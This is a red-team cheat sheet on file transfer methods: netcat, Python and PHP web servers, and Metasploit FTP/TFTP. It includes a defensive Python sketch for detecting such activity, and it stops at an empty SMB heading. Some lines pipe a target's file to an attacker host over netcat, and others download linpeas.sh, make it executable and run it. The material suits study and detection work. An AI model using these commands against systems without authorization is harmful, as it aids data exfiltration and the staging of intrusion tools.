Red Team File Transfers, All the Ways
Netcat File Transfer
Method One
- On the target box, create a file in the /tmp directory
touch file.txt
- On the target box, set up the listener and redirect STDOUT into the new file
nc -nlvp 1234 > file.txt
- On the sending machine, connect to the listener and feed it the file
nc [target box ip] 1234 < file-to-be-transferred.txt
Method Two
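- On the attacker machine run (keep the space before >: bash parses 443> as a redirection of file descriptor 443, which leaves nc without a port):
nc -lvp 443 > transfer.txt
- On the target machine run:
cat transfer.txt | nc $attackerip 443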
NC Transfer with gzip data
// on target machine
nc -nvlp 10000 | gzip -d > .y
// on local machine
cat ~/tools/static-binaries/socat/socat | gzip -c - | nc 127.0.0.1 10000
// check md5 hashes match on both systems
Web Servers:
Python HTTP Server File Transfer
- Start the Python server in the directory that contains the file you want to transfer
- Use the IP address assigned to your box; if a VPN is involved, use the VPN address
python3 -m http.server
python -m SimpleHTTPServer 8000
- The SimpleHTTPServer command above is for Python 2
- You can optionally specify a port that you want the server to run on (it defaults to 8000)
python3 -m http.server 80
- wget the file from the target box
wget http://172.16.6.1:8000/linpeas.sh
- Change permissions
chmod +x linpeas.sh
- Run the transferred file
./linpeas.sh
PHP Web Server
php -S $ip:80 # on attacker machine, to host the file
wget http://[attacker-ip]:80/file-to-download # on target machine, to download the file
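From the defender's side, the netcat listeners and ad-hoc Python and PHP web servers above each leave a process-creation record. The sketch below is an added example, not part of the original page: it flags those command lines and the wget, chmod +x, execute sequence. The host names, rule names and sample events are constructed, and it assumes exec-style logs that record argv only.

```python
import os
import shlex

# Constructed process-creation events (host, command line), shaped like auditd
# EXECVE or Sysmon-for-Linux records. Pipes and redirects never reach exec
# logs, so every rule keys on argv alone. Hosts and addresses are made up.
SAMPLE_EVENTS = [
    ("web01", "nc -nlvp 1234"),
    ("dev07", "python3 -m http.server 80"),
    ("dev07", "python -m SimpleHTTPServer 8000"),
    ("dev07", "php -S 10.0.0.5:80"),
    ("web01", "wget http://172.16.6.1:8000/linpeas.sh"),
    ("web01", "chmod +x linpeas.sh"),
    ("web01", "./linpeas.sh"),
    ("web01", "nc -z db01 5432"),        # benign port check, must not alert
    ("dev07", "python3 -m venv .venv"),  # benign, must not alert
]

def classify(cmdline):
    """Return the name of the rule one command line matches, or None."""
    argv = shlex.split(cmdline)
    if not argv:
        return None
    prog, args = os.path.basename(argv[0]), argv[1:]
    if prog in ("nc", "ncat", "netcat"):
        # Listen mode: a short-option cluster containing "l" (-nlvp, -lvp, -nvlp).
        if any(a[:1] == "-" and a[:2] != "--" and "l" in a for a in args):
            return "netcat_listener"
    if prog.startswith("python") and "-m" in args:
        i = args.index("-m")
        if args[i + 1:i + 2] in (["http.server"], ["SimpleHTTPServer"]):
            return "python_http_server"
    if prog == "php" and "-S" in args:
        return "php_builtin_server"
    return None

def fetch_then_execute(events):
    """Return (host, file) pairs where a wget download is chmod +x'd, then run."""
    fetched, armed, hits = set(), set(), []
    for host, cmdline in events:
        argv = shlex.split(cmdline)
        prog, name = os.path.basename(argv[0]), os.path.basename(argv[-1])
        if prog == "wget":
            fetched.add((host, name))
        elif prog == "chmod" and "+x" in argv and (host, name) in fetched:
            armed.add((host, name))
        elif (host, prog) in armed:
            hits.append((host, prog))
    return hits
```

Run classify over each event for single-command alerts and fetch_then_execute over the ordered stream for the download-and-run sequence; developer hosts that legitimately serve files this way need an allowlist.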
Metasploit Web Server
use auxiliary/server/ftp
use auxiliary/server/tftp
- Follow the Metasploit instructions. They are rather straightforward.
SMB File Transfer